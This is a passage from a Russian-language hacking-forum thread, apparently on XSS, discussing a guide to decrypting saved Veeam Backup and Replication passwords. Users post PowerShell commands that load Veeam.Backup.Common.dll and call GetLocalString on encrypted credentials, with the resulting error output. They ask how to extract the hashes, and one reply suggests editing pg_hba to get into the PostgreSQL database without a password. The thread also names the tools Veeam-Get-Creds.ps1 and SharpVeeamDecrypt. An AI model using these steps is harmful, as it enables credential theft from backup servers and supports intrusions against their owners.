• XSS.stack #1 – первый литературный журнал от юзеров форума

Мануал/Книга Декрипт паролей Veeam Backup and Replication без скриптов.

Пожалуйста, обратите внимание, что пользователь заблокирован
Vopros. Mojet li dat' bol'she passov po etoi sheme, nejeli cherez Veeam-Get-Creds.ps1 esli snyat'? Ili passi dast odinnakovo?
одинаково. Cтатья для тех, у кого не работает, Veeam-Get-Creds.ps1 или же SharpVeeamDecrypt
 
реверсни длл, посмотри теперь за что отвечает функция деша и все
call string Veeam.Backup.Common.VLocalProtectedString::GetLocalString(string encrypted)
пробую [Veeam.Backup.Common.VLocalProtectedString]::GetLocalString($encoded)
пш вывод:
Код:
Method invocation failed because [Veeam.Backup.Common.VLocalProtectedString] does not contain a method named
'GetLocalString'.
At line:1 char:1
+ [Veeam.Backup.Common.VLocalProtectedString]::GetLocalString($encoded)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : MethodNotFound
не контрится эта шляпа
 
call string Veeam.Backup.Common.VLocalProtectedString::GetLocalString(string encrypted)
пробую [Veeam.Backup.Common.VLocalProtectedString]::GetLocalString($encoded)
пш вывод:
Код:
Method invocation failed because [Veeam.Backup.Common.VLocalProtectedString] does not contain a method named
'GetLocalString'.
At line:1 char:1
+ [Veeam.Backup.Common.VLocalProtectedString]::GetLocalString($encoded)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : MethodNotFound
не контрится эта шляпа
Такая же хнень
Код:
PS C:\Windows\system32> $encoded = "***********************************************="
PS C:\Windows\system32> Add-Type -Path "C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Common.dll"
PS C:\Windows\system32> [Veeam.Backup.Common.ProtectedStorage]::GetLocalString($encoded)
Не удалось найти тип [Veeam.Backup.Common.ProtectedStorage].
строка:1 знак:1
+ [Veeam.Backup.Common.ProtectedStorage]::GetLocalString($encoded)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (Veeam.Backup.Common.ProtectedStorage:TypeName) [], RuntimeException
    + FullyQualifiedErrorId : TypeNotFound

PS C:\Windows\system32>
 
2) After this command:
Add-Type -Path "C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Common.dll"
3) The final touch:
[Veeam.Backup.Common.ProtectedStorage]::GetLocalString($encoded)

step 3 not working


PS C:\Windows\system32> [Veeam.Backup.Common.ProtectedStorage]::GetLocalString($encoded)
Unable to find type [Veeam.Backup.Common.ProtectedStorage].
At line:1 char:1
+ [Veeam.Backup.Common.ProtectedStorage]::GetLocalString($encoded)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (Veeam.Backup.Common.ProtectedStorage:typeName) [], RuntimeException
+ FullyQualifiedErrorId : TypeNotFound
 
Последнее редактирование:
Автор, а как ты подключишься к БД PostgreSQL, если у тебя нет пароля от пользователя postgre? С каким паролем-то ты подключился?

Считаю, что нужно дополнить статью, а именно показать, как сбрасывается пароль - там делов на минуту.

Можешь поделиться методикой?
Я столкнулся с тем, что постгре БД запоролена, в реестре указан непонятный хэш пароля. Как сбросить пасс?
 
в postgresql можно установить настройки, позволяющие входить без пароля, просто под юзером. возможно у автора было так.
 
Можешь поделиться методикой?
Я столкнулся с тем, что постгре БД запоролена, в реестре указан непонятный хэш пароля. Как сбросить пасс?
в файлик pg_hba можно докинуть аутентификацию например виндовую, даже перезапускать не нужно, насколько помню
 
Такая же хнень
Код:
PS C:\Windows\system32> $encoded = "***********************************************="
PS C:\Windows\system32> Add-Type -Path "C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Common.dll"
PS C:\Windows\system32> [Veeam.Backup.Common.ProtectedStorage]::GetLocalString($encoded)
Не удалось найти тип [Veeam.Backup.Common.ProtectedStorage].
строка:1 знак:1
+ [Veeam.Backup.Common.ProtectedStorage]::GetLocalString($encoded)
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (Veeam.Backup.Common.ProtectedStorage:TypeName) [], RuntimeException
    + FullyQualifiedErrorId : TypeNotFound

PS C:\Windows\system32>

Есть у кого решение это проблемы? шёл к успеху, не дошёл. Надо прям!
 
Через чё хеш снять нифига не понял sqlcmd ошибку выдаёт (((
sqlserver.exe процесс вообще отсутствует.
Исходя из этого мана он мешает работе или выключен
Ткните носом, что нужно сделать, чтобы хеш вытянуть.
 
Последнее редактирование:


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх